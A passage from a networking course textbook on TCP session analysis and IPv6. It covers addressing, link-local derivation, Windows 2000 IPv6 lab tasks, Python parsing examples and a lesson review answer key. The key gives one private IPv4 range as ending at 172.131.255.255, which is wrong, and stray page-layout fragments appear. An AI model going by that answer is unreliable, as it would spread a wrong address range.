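# Frames 3-5, constructed: SYN, SYN-ACK, ACK. A SYN consumes one sequence
# number, so each side acknowledges the peer's ISN + 1.
HANDSHAKE = [
    build_tcp_header(2025, 21, CLIENT_ISN, 0, ["SYN"]),
    build_tcp_header(21, 2025, SERVER_ISN, CLIENT_ISN + 1, ["SYN", "ACK"]),
    build_tcp_header(2025, 21, CLIENT_ISN + 1, SERVER_ISN + 1, ["ACK"]),
]

# Frames 48-51, constructed: each FIN is acknowledged by the other side. The
# sequence numbers assume 60 bytes were sent by the client and 300 by the server.
C_SEQ, S_SEQ = CLIENT_ISN + 1 + 60, SERVER_ISN + 1 + 300
TEARDOWN = [
    build_tcp_header(2025, 21, C_SEQ, S_SEQ, ["FIN", "ACK"]),
    build_tcp_header(21, 2025, S_SEQ, C_SEQ + 1, ["ACK"]),
    build_tcp_header(21, 2025, S_SEQ, C_SEQ + 1, ["FIN", "ACK"]),
    build_tcp_header(2025, 21, C_SEQ + 1, S_SEQ + 1, ["ACK"]),
]


def analyse_handshake(frames=HANDSHAKE):
    """Decode the three frames and confirm the ISN+1 acknowledgement chain."""
    p = [parse_tcp_header(f) for f in frames]
    chain_ok = (p[1]["ack"] == p[0]["seq"] + 1
                and p[2]["seq"] == p[0]["seq"] + 1
                and p[2]["ack"] == p[1]["seq"] + 1)
    return p, [label_frame(x) for x in p], chain_ok


def analyse_teardown(frames=TEARDOWN):
    """Decode the four frames and confirm every FIN was acknowledged by the peer."""
    p = [parse_tcp_header(f) for f in frames]
    fins = [x for x in p if "FIN" in x["flags"]]
    acked = all(any(y["sport"] == fin["dport"] and y["ack"] == fin["seq"] + 1 for y in p)
                for fin in fins)
    return p, [label_frame(x) for x in p], len(fins) == 2 and acked


if __name__ == "__main__":
    for fields_list, labels, _ok in (analyse_handshake(), analyse_teardown()):
        for fields, label in zip(fields_list, labels):
            print(f"{fields['sport']:>5} -> {fields['dport']:<5} "
                  f"seq=0x{fields['seq']:08X} ack=0x{fields['ack']:08X}  {label}")
```

The chain check in analyse_handshake is the same arithmetic you do by eye in Network Monitor's detail pane: the SYN-ACK must acknowledge the client's ISN plus one, and the final ACK must carry that value as its own sequence number. A session whose acknowledgement numbers do not line up this way was not set up by these two frames, which is the first thing to verify when a capture looks like it contains an injected or spoofed segment.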


Topic 1I
Fundamentals of IPv6
It has been estimated by the U.S. Census Bureau that by the year 2050 there will be over 9 billion people living on Earth. If we (for the moment, putting economics aside) are to attempt to provide the full use of the Internet to every person on the planet, the current version of the Internet Protocol will likely be unable to handle the demand. When we do the math, we can quickly calculate that IP version 4, or IPv4, will allow for only 4 billion addresses. Even if we take into consideration technologies such as Network Address Translation (NAT), it becomes quickly obvious that an improvement is required. The need for IP addresses is also not taking into consideration the expected surge in PDAs, cell phones with Web access, and many other different types of devices that will connect to the Internet. It is reasonable to expect that every person on the planet will have a need for far more than one IP address.

From an addressing perspective, you may wonder how many IPv6 addresses are available, when compared to IPv4. As you know, IPv4 is a 32-bit number, offering approximately 4 billion addresses. IPv6 addresses are 128-bit numbers, which, if you take the time to do the math, works out to approximately 340 trillion, trillion, trillion addresses (or 3.4 x 10^38). There are a few formatting issues, where a portion of the address space may not be used for single addresses; however, by most estimates, even after formatting, the low-end number that will remain is 35 trillion addresses. This should be more than enough addresses for each person on the planet having every device imaginable connected to the Internet, with many addresses remaining.

IPv6 Address Formats

IPv6 Addresses

If the need for addressing was not enough of a driving factor to show the need for IPv6, another issue to consider is the IPv4 routing tables. As more and more people, and devices, use the Internet, the routing tables are getting more and more complex. Imagine the routing table once every current IPv4 address is used. Routing will become quite difficult to manage.

Because IPv6 presents a solution to the addressing and other problems that are starting to become prominent on the Internet, we will take a look into the basics of this protocol, starting with the addresses of version 6. An IPv6 address is a 128-bit number, which (for now) is not divided into the classes that are used in IPv4 addressing. The address is written in 8 blocks of 16 bits, using hexadecimal numbering, and separated by a colon. The following two lines are examples of IPv6 addresses:

8ab2:1cc3:2fa4:0:6b8a:31a2:9ef3:85bc
1012:321:544:300:0:0:0:17


A few points on the above addresses need to be clarified further. There does not need to be a full four characters per block, as in the second address, which happens to use only decimal digits. Additionally, it is possible to identify consecutive blocks of 0 using two colons (::). When the two colons are used, be aware that they can only appear once in an IP address. Using the two colons, the second address from above would look like this:

1012:321:544:300::17

Another type of address that can be present is called the dotted decimal suffix address. This is used during the transition between IPv4 and IPv6. This address combines the traditional IPv4 address with the hexadecimal used in IPv6. An example of this type of address would look like this:

::ffff:192.168.100.23

The final type of address to investigate is the loopback address. This address is quite different from the IPv4 address of 127.0.0.1. In IPv6, the loopback address is much smaller, and looks like this: ::1

Unicasting and Multicasting

In IPv6, the concepts of broadcasting and multicasting of IPv4 are helpful, but do not directly link the two protocols together on these grounds. For example, in IPv6, there is no broadcast address at all. What are used are unicast, anycast, and multicast addresses. Unicast addresses are identifiers for a single interface, and are what packets are addressed to when sent to a specific interface. There are two unicast addresses used in IPv6 that we will address in this topic:

Link-local unicast address. Link-local addresses have been designed to use on a single link, such as when no routers are present.

Site-local unicast address. Site-local addresses are designed for use by organizations that intend to connect to the Internet, and can be routed.

Routers in IPv6 networks do not forward packets that are from link-local addresses.

A multicast address is an identifier for a group of interfaces, and is what packets are addressed to when sending to groups of interfaces. Some of the defined addresses for multicasting are:

To address all nodes: FF01::1 or FF02::1.
To address all router nodes: FF01::2 or FF02::2.


In IPv6, when a node is searching for another node on the network, this is called neighbor discovery. The ARP process used in IPv4 is not used in IPv6. Instead, what is used are ICMP and multicasting. Because the process uses ICMP, this allows for more media independence and allows for IP security to be used, versus ARP.


The anycast address is also an identifier for a group of interfaces. When a packet is sent to an anycast address, it is delivered to one of the interfaces that are identified by the address (often referred to as the nearest one).
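The address-format rules from the previous section (hexadecimal blocks, the single permitted "::", the dotted-decimal suffix, the ::1 loopback) and the unicast/multicast types just described, worked through in code. This is an added example, not part of the course; it goes slightly beyond the text by rejecting a second "::" and by classifying an address by its prefix. The prefixes used for classification (fe80::/10 link-local, fec0::/10 site-local, ff00::/8 multicast, ::ffff:0:0/96 for the dotted-decimal suffix form) are the standard values, not ones the text lists.

```python
"""IPv6 address formatting: expansion, '::' compression and prefix classification.

Added example (not course code). It applies the rules from the text: eight
16-bit hexadecimal blocks, '::' standing for a run of zero blocks at most once,
a dotted-decimal IPv4 suffix for the last 32 bits, and ::1 as loopback.
"""


def expand_ipv6(addr):
    """Return the eight 16-bit blocks of *addr* as integers, applying the '::' rule."""
    addr = addr.strip().lower()
    if addr.count("::") > 1:
        raise ValueError("'::' may appear only once in an IPv6 address")
    # Dotted-decimal suffix: the last 32 bits are written as an IPv4 address.
    if "." in addr:
        head, sep, v4 = addr.rpartition(":")
        octets = [int(o) for o in v4.split(".")]
        if len(octets) != 4 or any(not 0 <= o <= 255 for o in octets):
            raise ValueError("bad dotted-decimal suffix: " + v4)
        hi, lo = octets[0] << 8 | octets[1], octets[2] << 8 | octets[3]
        addr = f"{head}{sep}{hi:x}:{lo:x}"
    if "::" in addr:
        left, right = addr.split("::")
        left_blocks = [b for b in left.split(":") if b]
        right_blocks = [b for b in right.split(":") if b]
        missing = 8 - len(left_blocks) - len(right_blocks)
        if missing < 1:
            raise ValueError("'::' must stand for at least one zero block")
        blocks = left_blocks + ["0"] * missing + right_blocks
    else:
        blocks = addr.split(":")
    if len(blocks) != 8:
        raise ValueError(f"expected 8 blocks, got {len(blocks)}")
    values = []
    for b in blocks:
        if not 1 <= len(b) <= 4:
            raise ValueError("each block is 1 to 4 hex digits: " + repr(b))
        values.append(int(b, 16))          # raises ValueError on non-hex characters
    return values


def compress_ipv6(blocks):
    """Write eight blocks without leading zeros, replacing the longest zero run by '::'."""
    best_start, best_len = -1, 0
    run_start, run_len = -1, 0
    for i, v in enumerate(blocks + [None]):   # sentinel closes the final run
        if v == 0:
            if run_len == 0:
                run_start = i
            run_len += 1
        else:
            if run_len > best_len:
                best_start, best_len = run_start, run_len
            run_len = 0
    hexes = [f"{v:x}" for v in blocks]
    if best_len < 2:                           # a lone zero block stays written as '0'
        return ":".join(hexes)
    left = ":".join(hexes[:best_start])
    right = ":".join(hexes[best_start + best_len:])
    return left + "::" + right


def classify_ipv6(addr):
    """Name the address type by its prefix (standard prefixes; see lead-in)."""
    b = expand_ipv6(addr)
    if b == [0, 0, 0, 0, 0, 0, 0, 1]:
        return "loopback"
    if b[:5] == [0, 0, 0, 0, 0] and b[5] == 0xFFFF:
        return "IPv4-mapped (dotted-decimal suffix)"
    if b[0] >> 8 == 0xFF:
        return "multicast"
    if b[0] & 0xFFC0 == 0xFE80:
        return "link-local unicast"
    if b[0] & 0xFFC0 == 0xFEC0:
        return "site-local unicast"
    return "global unicast"


if __name__ == "__main__":
    for sample in ("8ab2:1cc3:2fa4:0:6b8a:31a2:9ef3:85bc", "1012:321:544:300:0:0:0:17",
                   "::ffff:192.168.100.23", "::1", "FF02::1", "fe80::2d0:9ff:fe7f:b21"):
        print(f"{sample:40} -> {compress_ipv6(expand_ipv6(sample)):28} {classify_ipv6(sample)}")
```

Note that compress_ipv6 never writes a single zero block as "::", so the first sample address above stays exactly as the text prints it, while the second collapses to 1012:321:544:300::17. The "only once" rule matters for anything that matches addresses as strings (filters, access lists, log searches): two different spellings of one address are a classic way for a rule to miss traffic, so normalise to one form before comparing.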

IPv6 X-casting

on
63

IPv6 Security
One of the advantages that IPv6 presents over IPv4, in addition to the address-space and routing issues, is security. Although IPv4 allows for the addition of security by using IPSec, it is not mandated. In an IPv6 network, the use of IPSec is much more streamlined, because the functionality is built right in. In IPv6, there are two extension headers that are used to increase security. These two are called the Authentication Header (AH) and the Encapsulating Security Payload (ESP).

Authentication Header: A field that immediately follows the IP header in an IP datagram and provides authentication and integrity checking for the datagram.

ESP: (Encapsulating Security Payload) A mechanism to provide confidentiality and integrity protection to IP datagrams.

confidentiality: Assuring information will be kept secret, with access limited to appropriate persons.

authentication: To positively verify the identity of a user, device, or other entity in a computer system, often as a prerequisite to allowing access to resources in a system.

The IP Authentication Header (AH) is used for providing authentication and integrity. Keep in mind that since AH does not encrypt the IPv6 datagram, confidentiality is not provided. And, although IPv6 datagrams are not encrypted by default, IPv6 does support multiple authentication techniques and algorithms.

The Encapsulating Security Payload Header is used to provide both integrity and confidentiality on the IPv6 datagrams. In this implementation, the ESP uses Tunnel Mode, in which the whole IP packet is encrypted and a new unencrypted IP header is added, and Transport Mode, in which only the payload (with options) is encrypted.

Installing IPv6
For the tasks in this topic, you will use IPv6 on Windows 2000. Microsoft has released the IPv6 Technology Preview for educational and research functions. It is not intended for commercial use at this time.

To install the IPv6 stack on Windows 2000 Professional or Server, you must be running at least SP1 and running the IPv4 stack. To install the stack on Windows 2000 running SP2 or higher, there are a few additional steps that need to be taken to get it running successfully. The IPv6 stack is included with Windows XP, and can be run by entering ipv6 install at the command prompt. The IPv6 stack runs parallel to the existing IPv4 stack, so there should be no conflicts.

TASK 1I-1
Installing IPv6

Setup: You are logged on to Windows 2000 Server as Administrator.

1. Open the Network And Dial-up Connections Control Panel, and disable the Classroom Hub interface.

2. At the root of your boot partition, create a folder called IPv6test.

3. Copy the file tpipv6-001205.exe from the location specified by your instructor to the new folder.

Provide students with the location of the IPv6 installation files.

4. From the local folder IPv6test, run tpipv6-001205.exe, and extract the files to the same location.

5. Open the Run dialog box, and enter \ipv6test\setup.exe -x, and extract the files to a subfolder of the current folder (for example, \IPv6test\files). Click OK to close the Extraction Complete information box.

6. Start a text editor, and open the file Hotfix.inf, which should be in the folder containing the extracted files (\IPv6test\files).

7. In the Version section of the Hotfix.inf file, change the line NTServicePackVersion=256 to NTServicePackVersion=512 and save the change. Close the text editor.

8. From the folder containing the extracted files (IPv6test\files), run Hotfix.exe. When you are prompted to do so, click OK to reboot the computer to Windows 2000 Server.

9. Log back on as Administrator.

10. Right-click My Network Places, and choose Properties.

11. Double-click the Ethernet interface that's labeled Partner, and click Properties.

12. Click the Install button.

13. Select Protocol, and click Add.

14. Select the Microsoft IPv6 Protocol and click OK.

15. Click Close twice.

16. Open a command prompt, and enter the command ipv6 if. You should see output resembling the following graphic.

IPv6 Interfaces

17. Minimize the command prompt.

IPv6 Interface Types
In the previous task, when you issued the ipv6 if command, you saw that there are four interfaces, numbered sequentially from 4 to 1. Interface 1 is used for IPv6 loopback. It is always a pseudo-interface.

Interface 2 is used for configured tunneling, automatic tunneling, and 6-to-4 tunneling. It is always a pseudo-interface.

Interface 3 is a 6-over-4 interface.

Interface 4 is the Ethernet interface.

Interfaces are numbered sequentially in the order created. This numbering will vary from computer to computer.

6-over-4 Interfaces
Take another look at the output for Interface 3. This interface has a link-layer address of the form a.b.c.d. Now, as far as the OSI Model is concerned, you know that addresses of the form a.b.c.d are IPv4 Network layer addresses. However, when IPv6 in its present form has to be tunneled over IPv4, the Network layer IPv4 address a.b.c.d is treated as a link-layer address by IPv6. You will have one 6-over-4 interface for every IPv4 address assigned to your computer. This means that, in the previous example, if you add a second IPv4 address to an interface, such as 192.168.16.1, and run the ipv6 if command again, you will see a fifth listing in addition to the other four.

Figure 1-21: Additional virtual interface for second IP address.

The terms link-local address and link-level address are often used interchangeably.

The link-local address of a 6-over-4 interface is FE80::a.b.c.d, expressed in IPv6 colon-hexadecimal notation. For example, for the IPv4 address 172.27.10.1, the corresponding link-local address is fe80::ac1b:a01 (because 172 = 0xAC, 27 = 0x1B, 10 = 0xA, and 1 = 0x1; therefore 172.27.10.1 = 0xAC1BA01). RFC 2529 provides more information about 6-over-4.

Ethernet Interfaces
Take another look at Interface 4 (the Ethernet interface). This interface has a link-local address of fe80::2d0:9ff:fe7f:b21. The format of this address is fe80::2half-the-MAC:ff:fe-the-other-half-of-the-MAC. Of course, the actual method of calculating this value is slightly different, but we will worry about that later. Interfaces that are listed with the traditional, 48-bit, link-layer address are Ethernet interfaces. You should have one Ethernet interface for every Ethernet adapter. The link-local address of the Ethernet interface will use the IPv6 interface identifier derived from the MAC address. For example, if the link-level address is 00-20-78-03-a5-b7, then the preferred address is listed as fe80::220:78ff:fe03:a5b7.
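Both link-local derivations from this section, the Ethernet form (insert ff:fe in the middle of the MAC and flip the universal/local bit of the first byte, which is the "slightly different" calculation the text defers) and the 6-over-4 form fe80::a.b.c.d, as an added example that is not code from the course or from Microsoft's preview. The standard library's ipaddress module is used only to print the compressed form; the MAC 00-d0-09-7f-0b-21 is an assumption chosen so that it produces the fe80::2d0:9ff:fe7f:b21 address shown for Interface 4.

```python
"""Derive IPv6 link-local addresses the way they appear in ipv6 if output.

Added example (not the course's code). link_local_from_mac() applies the
modified EUI-64 construction: split the 48-bit MAC in half, insert ff:fe, and
flip bit 1 of the first byte (the universal/local bit), so 00 becomes 02.
link_local_from_ipv4() builds the 6-over-4 form fe80::a.b.c.d. Canonical '::'
compression is delegated to the standard library's ipaddress module.
"""
import ipaddress


def parse_mac(mac):
    """Accept 00-20-78-03-a5-b7 or 00:20:78:03:a5:b7 and return the six bytes."""
    octets = bytes.fromhex(mac.replace("-", "").replace(":", ""))
    if len(octets) != 6:
        raise ValueError("MAC address must be 48 bits: " + mac)
    return octets


def interface_id_from_mac(mac):
    """Modified EUI-64 interface identifier (8 bytes) from a 48-bit MAC."""
    m = bytearray(parse_mac(mac))
    m[0] ^= 0x02                       # flip the universal/local bit: 00 -> 02
    return bytes(m[:3]) + b"\xff\xfe" + bytes(m[3:])


def link_local_from_mac(mac):
    """Compressed fe80::/64 link-local address of an Ethernet interface."""
    iid = interface_id_from_mac(mac)
    return str(ipaddress.IPv6Address(b"\xfe\x80" + b"\x00" * 6 + iid))


def link_local_from_ipv4(v4):
    """Compressed fe80::a.b.c.d link-local address of a 6-over-4 interface."""
    v4_bytes = ipaddress.IPv4Address(v4).packed
    return str(ipaddress.IPv6Address(b"\xfe\x80" + b"\x00" * 10 + v4_bytes))


def mac_from_link_local(addr):
    """Reverse the construction: recover the MAC embedded in an EUI-64 link-local address.

    Returns None when the interface identifier does not carry the ff:fe marker,
    for example for a 6-over-4 interface.
    """
    raw = ipaddress.IPv6Address(addr).packed
    iid = bytearray(raw[8:])
    if iid[3:5] != b"\xff\xfe":
        return None
    iid[0] ^= 0x02                     # undo the universal/local bit flip
    return "-".join(f"{b:02x}" for b in iid[:3] + iid[5:])


if __name__ == "__main__":
    # 00-d0-09-7f-0b-21 is assumed; it yields the Interface 4 address in the text.
    for mac in ("00-20-78-03-a5-b7", "00-d0-09-7f-0b-21"):
        print(f"MAC {mac}  ->  {link_local_from_mac(mac)}")
    print(f"IPv4 172.27.10.1      ->  {link_local_from_ipv4('172.27.10.1')}")
    print(f"fe80::2d0:9ff:fe7f:b21  embeds MAC {mac_from_link_local('fe80::2d0:9ff:fe7f:b21')}")
```

The reverse function is the practical point for a defender: because the interface identifier is built from the MAC, any host that sees an EUI-64 link-local address can read the hardware address (and, from its first three bytes, the adapter vendor) out of it. Inventories and logs that treat MAC addresses as sensitive should treat these addresses the same way.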


TASK 1I-2
Getting Another 6-over-4 Address

Setup: You are logged on to Windows 2000 Server as Administrator. IPv6 has been installed, and a command prompt and the Network And Dial-up Connections Control Panel are open.

1. Double-click the Partner interface, and click Properties.

2. Double-click Internet Protocol (TCP/IP).

3. Click Advanced. You should see an IP address listed, such as 172.26.10.z or 172.28.10.z.

4. In the IP Addresses box, click Add.

If you are on the RIGHT side of the classroom, add the IP address 192.168.28.z. For the value z, use the same value as the last octet of your existing IP address. Leave the subnet mask at 255.255.255.0.

If you are on the LEFT side of the classroom, add the IP address 192.168.26.z. For the value z, use the same value as the last octet of your existing IP address. Leave the subnet mask at 255.255.255.0.

5. Click Add, then click OK three times, and then click Close.

6. Switch to the command prompt, and enter the ipv6 if command.

7. Verify that the output reflects a new 6-over-4 address based on the new IP address you just added.

8. Remove the IP address that you just added.

IPv6 Utilities
Just as the TCP/IP stack for IPv4 comes with troubleshooting tools such as ping, tracert, and so forth, the IPv6 stack also provides some built-in tools, such as:

ipv6
ipsec6
ping6
tracert6
6to4cfg
ttcp
net

The net command has many subcommands, and their corresponding arguments and options, such as net stop and net start, will enable you to stop or start services. You can use this to stop or start IPv6. You should know that if you stop and start IPv6, you may end up changing interface numbers (after interfaces 1 and 2 are accounted for), because doing this is equivalent to reinitializing the interfaces after a reboot.

The ipv6.exe Command
You can use the ipv6.exe command to manually configure interfaces, retrieve information about the state of the interfaces, and so forth. All configuration of IPv6 protocol parameters can be done with this command. You can also use it to query and configure addresses, caches, and routes, by using the many subcommands and their corresponding arguments and options. In fact, you have already used this command with the if option to view information on interfaces.

TASK 1I-3
Interface Initializing

Setup: You are logged on to Windows 2000 Server as Administrator. IPv6 has been installed, and a command prompt is open.

1. At the command prompt, enter net stop tcpip6 to stop the IPv6 stack.

2. Enter ipv6 if, and observe the response. You should see a message stating that the IPv6 protocol stack could not be accessed.

3. Enter net start tcpip6 to restart the IPv6 stack.

4. Enter ipv6 if, and verify that you receive output relating to the interfaces.

Using the ipsec6.exe Command
You can use the ipsec6.exe command to configure IPSec policies and SAs (Security Associations) for the IPv6 protocol. As with ipv6.exe, ipsec6.exe has many subcommands, each with its own set of arguments and options. IPSec is covered in greater depth later in the course.

TASK 1I-4
Using the ipsec6 Command

Setup: You are logged on to Windows 2000 Server as Administrator. IPv6 has been installed, and a command prompt is open.

1. At the command prompt, enter ipsec6 -? to get help on the ipsec6 command.

2. Observe the explanation for the switches sp and sa. These switches enable you to print the security policy and security associations entries to the screen.

3. Enter ipsec6 sp, and observe the output, which wraps around in your display.

4. Enter ipsec6 sa, and observe the output, which again wraps around in your display. These entries are quite wide, in terms of the number of ASCII characters used; therefore, you will redirect the output from these commands to text files and use Notepad to view them.

5. Enter ipsec6 sp > sp-out.txt to direct the output to a new file called sp-out.txt.

6. Enter ipsec6 sa > sa-out.txt to direct the output to a new file called sa-out.txt.

7. Locate the two text files you just created, and open them in Notepad.

8. In the file sp-out.txt, observe that you do not have a security policy.

9. In the file sa-out.txt, observe that you do not have a security association. If you want to use IPSec with IPv6, you first need to create similar text files using the ipsec6 command with the c switch, followed by a file name; for example, ipsec6 c secur. Two files will automatically be created for you, one with the extension .spd and the other with the extension .sad, which, as you can figure out by now, means that security-policy descriptors need to be entered in the SPD file and security-association descriptors need to be entered in the SAD file.

10. Close Notepad.

Using the ping6.exe Command
You can use the ping6 command with IPv6 just as you use ping with IPv4. By using this command, you send ICMPv6 Echo Request messages, and can evaluate the corresponding replies.

TASK 1I-5
Using the ping6 Command

Setup: You are logged on to Windows 2000 Server as Administrator. IPv6 has been installed, and a command prompt is open.

1. Enter ping -? to get help on the ping command.

2. Enter ping6 -?, and compare the versions of ping for IPv4 and IPv6.

3. Enter ipv6 if. Record the first preferred address under the link-local address:

Each address will be different.

4. Enter ping6 neighboring_IPv6_address, and observe the output. You should see output similar to the following graphic.

By now, you're probably beginning to wonder how this IPv6 ping packet would be different from an IPv4 ping packet. So let's perform some captures.

Capturing and Analyzing IPv6 Traffic
You can use Network Monitor to perform these captures, if you install the appropriate add-ons, or parsers. We will use Ethereal, however, as the current version (which we installed and examined earlier) includes IPv6 support without having to install any add-ons.

TASK 1I-6
Capturing and Analyzing IPv6 Traffic

Setup: You are logged on to Windows 2000 Server as Administrator. IPv6 has been installed, and a command prompt is open.

Note: For this task, you should work in pairs.

1. On one machine, start Ethereal. (From the Start menu, choose Programs→Ethereal→Ethereal.)

2. Start a capture.

3. In the Interface selection box, select the adapter you want to perform the capture on.

4. Click OK.

5. In the command prompt window, enter ping6 neighboring_IPv6_address, and watch the activity taking place with respect to the four echo replies.

6. In Ethereal, stop the capture.

7. Highlight the ICMPv6 Echo Requests and Replies, and view their contents.

8. What is the Ethertype for IPv6? 0x86dd.

9. Start another capture.

10. This time, from the neighboring machine, enter tracert6 neighboring_IPv6_address, and watch the activity taking place with respect to the trace route.

11. In Ethereal, stop the capture.

12. Highlight the ICMPv6 Echo Requests and Replies, and view their contents.

13. Observe the differences in contents, compared to the ping6 packets.

Note: Perform the rest of this task on all computers.

14. Stop the IPv6 stack by using the net stop tcpip6 command.

15. Re-enable the Classroom Hub interface.

16. Close all open windows.
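The frames you highlight in step 7, dissected layer by layer in code: Ethernet EtherType 0x86dd (from step 8), the 40-byte IPv6 header, and the ICMPv6 echo message. This is an added example, not code from the course or from Ethereal. The frame bytes are constructed so that it runs offline; the IPv6 next-header value 58 for ICMPv6 and the echo types 128 (request) and 129 (reply) are the standard values. The MAC addresses, the identifier and sequence fields, and the payload are assumptions, the link-local addresses are the two from the Ethernet Interfaces section, and the ICMPv6 checksum is left at zero.

```python
"""Dissect an Ethernet frame carrying an ICMPv6 Echo Request or Reply.

Added example (not from the course). The frames are constructed here so the code
runs offline: EtherType 0x86dd comes from the task; next header 58 (ICMPv6) and
ICMPv6 types 128/129 are the standard values. MACs, identifier/sequence values
and payload are assumptions; the ICMPv6 checksum is left at zero.
"""
import ipaddress
import struct

ETHERTYPE_IPV6 = 0x86DD
NEXT_HEADER_ICMPV6 = 58
ICMPV6_TYPES = {128: "Echo Request", 129: "Echo Reply"}


def build_icmpv6_echo(src_mac, dst_mac, src_ip, dst_ip, echo_type, ident, seq, payload=b"abcd"):
    """Assemble Ethernet + IPv6 (40 bytes, no extension headers) + ICMPv6 echo message."""
    icmp = struct.pack("!BBHHH", echo_type, 0, 0, ident, seq) + payload
    ver_tc_flow = 6 << 28                      # version 6, traffic class 0, flow label 0
    ip6 = struct.pack("!IHBB", ver_tc_flow, len(icmp), NEXT_HEADER_ICMPV6, 128)
    ip6 += ipaddress.IPv6Address(src_ip).packed + ipaddress.IPv6Address(dst_ip).packed
    eth = bytes.fromhex(dst_mac.replace(":", "")) + bytes.fromhex(src_mac.replace(":", ""))
    eth += struct.pack("!H", ETHERTYPE_IPV6)
    return eth + ip6 + icmp


def dissect(frame):
    """Return a summary dict; raise ValueError if the frame is not IPv6 carrying ICMPv6."""
    if len(frame) < 14 + 40 + 8:
        raise ValueError("frame too short for Ethernet + IPv6 + ICMPv6")
    ethertype = struct.unpack("!H", frame[12:14])[0]
    if ethertype != ETHERTYPE_IPV6:
        raise ValueError(f"not IPv6: EtherType 0x{ethertype:04x}")
    ver_tc_flow, payload_len, next_hdr, hop_limit = struct.unpack("!IHBB", frame[14:22])
    if ver_tc_flow >> 28 != 6:
        raise ValueError("IPv6 version field is not 6")
    src = ipaddress.IPv6Address(frame[22:38])
    dst = ipaddress.IPv6Address(frame[38:54])
    if next_hdr != NEXT_HEADER_ICMPV6:
        raise ValueError(f"next header {next_hdr} is not ICMPv6")
    icmp = frame[54:54 + payload_len]
    icmp_type, code, _csum, ident, seq = struct.unpack("!BBHHH", icmp[:8])
    return {"ethertype": ethertype, "src": str(src), "dst": str(dst), "hop_limit": hop_limit,
            "icmp_type": icmp_type, "code": code, "kind": ICMPV6_TYPES.get(icmp_type, "other"),
            "ident": ident, "seq": seq, "data": icmp[8:]}


# Constructed sample: one echo request and its reply between two link-local neighbours.
# The MACs are assumed; the addresses are the two from the Ethernet Interfaces section.
SAMPLE_REQUEST = build_icmpv6_echo("00:d0:09:7f:0b:21", "00:20:78:03:a5:b7",
                                   "fe80::2d0:9ff:fe7f:b21", "fe80::220:78ff:fe03:a5b7",
                                   128, ident=0x0100, seq=1)
SAMPLE_REPLY = build_icmpv6_echo("00:20:78:03:a5:b7", "00:d0:09:7f:0b:21",
                                 "fe80::220:78ff:fe03:a5b7", "fe80::2d0:9ff:fe7f:b21",
                                 129, ident=0x0100, seq=1)


def pair_echoes(frames):
    """Match replies to requests by (identifier, sequence), as you do by eye in Ethereal."""
    pending, matched = {}, []
    for f in frames:
        d = dissect(f)
        key = (d["ident"], d["seq"])
        if d["icmp_type"] == 128:
            pending[key] = d
        elif d["icmp_type"] == 129 and key in pending:
            matched.append((pending.pop(key), d))
    return matched, list(pending.values())


if __name__ == "__main__":
    for frame in (SAMPLE_REQUEST, SAMPLE_REPLY):
        d = dissect(frame)
        print(f"EtherType 0x{d['ethertype']:04x}  {d['src']} -> {d['dst']}  "
              f"hop limit {d['hop_limit']}  {d['kind']} id={d['ident']} seq={d['seq']}")
```

The EtherType test at the top of dissect() is also the simplest IPv6 detection there is: on a network that has not deliberately deployed IPv6, any frame with EtherType 0x86dd is worth a look, because the preview stack you just installed (and similar stacks on other hosts) will happily talk IPv6 on the local link whether or not anyone is watching it.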

Summary
In this lesson, you looked deep into the structure of the TCP/IP protocol. You reviewed the RFCs associated with IP, ICMP, TCP, and UDP. You then used Network Monitor and Ethereal to capture and analyze IP packets. You examined captures associated with network traffic. You learned to read the actual data being transmitted between two or more hosts. Finally, you analyzed a complete session, frame-by-frame. You also took a look at a technology preview of IPv6.

Lesson Review

1A How many layers are in the OSI Model?
Seven.

How many layers are in the TCP/IP Model?
Four.

What are the assignable classes of IP addresses?
A, B, and C.

What are the three private ranges of IP addresses, as defined in the RFCs?
a. 10.0.0.0 to 10.255.255.255
b. 172.16.0.0 to 172.131.255.255
c. 192.168.0.0 to 192.168.255.255

1B How many control flags are in a TCP header?
Six.

What is the function of an acknowledgement number?
To provide an acknowledgement for a received packet. The value is usually tied into the SYN number on the received packet.

How many steps are required to establish a TCP connection?
Three.

How many steps are required to tear down a TCP connection?
Four.

What are the two main views of Network Monitor?
Display View and Capture View.

1C What is the first field that is read by the computer in the IP header?
Version.

What is the Protocol ID of ICMP in the IP header?
1.

What is the Protocol ID of TCP in the IP header?
6.

What is the Protocol ID of UDP in the IP header?
17.

1D What is the first field that is read by the computer in the ICMP message?
Type.

How many bits make up the Type field?
Eight.

How many bits make up the Code field?
Eight.

1E What is the first field that is read by the computer in the TCP header?
Source Port Number.

How many control bits are in the TCP header?
Six.

How many bits is the Sequence Number?
32.

How many bits is the Acknowledgement Number?
32.

1F What is the first field that is read by the computer in the UDP header?
Source Port Number.

How many bits are both the source and destination port numbers?
16.

What is the UDP header and data encapsulated in?
An IP datagram.

What is in the payload of the tftp.cap file that you analyzed?
Cisco Router Configuration and Access Lists.

1G In the fragment.cap file that you analyzed, how do you suppose this fragmentation happened?
By a user sending a large ping. (See the file fragment.txt, in the same folder as fragment.cap, to understand how this was initiated.)

What was the upper-layer protocol that caused the fragmentation?
ICMP.

Why is there no upper-layer protocol list in the Detail pane for frames 2 through 13?
These are the subsequent fragments whose upper-layer protocol is referred to in the first fragment; therefore, they do not have any header information other than IP.

1H In the FTP capture file that you analyzed in this topic, what pair of sockets are involved in the initial three-way handshake?
On the client: IP address 172.16.30.2, port 2025. On the FTP Server: IP address 172.16.30.1, port 21.

In the FTP capture file that you analyzed in this topic, what pair of sockets are involved in the exchange of FTP data in response to the request for directory listing?
On the FTP Server: IP address 172.16.30.1, port 20. On the client: IP address 172.16.30.2, port 2026.

In the FTP capture file that you analyzed in this topic, what frames indicate that a three-way handshake is taking place between the FTP server and the client in preparation for the sending of FTP data in response to the request for the file textfile.txt?
Frames 35, 36, and 37.

1I What is the essential difference between a link-local and a site-local unicast address?
The essential difference is that link-local addresses are not routable. Site-local addresses can be routed.

List some of the utilities provided to you by Microsoft in its IPv6 technology preview.
Some of the utilities are ipv6, ipsec6, ping6, tracert6, 6to4cfg, and ttcp.

What are the two files required to configure ipsec6 with ipv6 in Windows 2000?
Filename.spd and filename.sad.

LESSON 2
Implementing IPSec

Overview
In this lesson, you will be introduced to the concepts of IPSec. You will examine and configure the Microsoft Management Console and identify the predefined IPSec policies in Windows 2000. You will create new policies and implement IPSec to specifically use AH, ESP, or both, in Transport Mode. Finally, you will analyze IPSec traffic in Network Monitor.

Data Files
newroot.cer

Lesson Time
3 hours, 30 minutes

Objectives
To be able to implement IPSec, you will:

2A Define the function of IPSec in a networked environment.
Given a running network, you will examine the IPSec structure, cryptography, the Encapsulating Security Payload, the Authentication Header, the Internet Key Exchange, and modes of implementation.

2B Examine IPSec policy management.
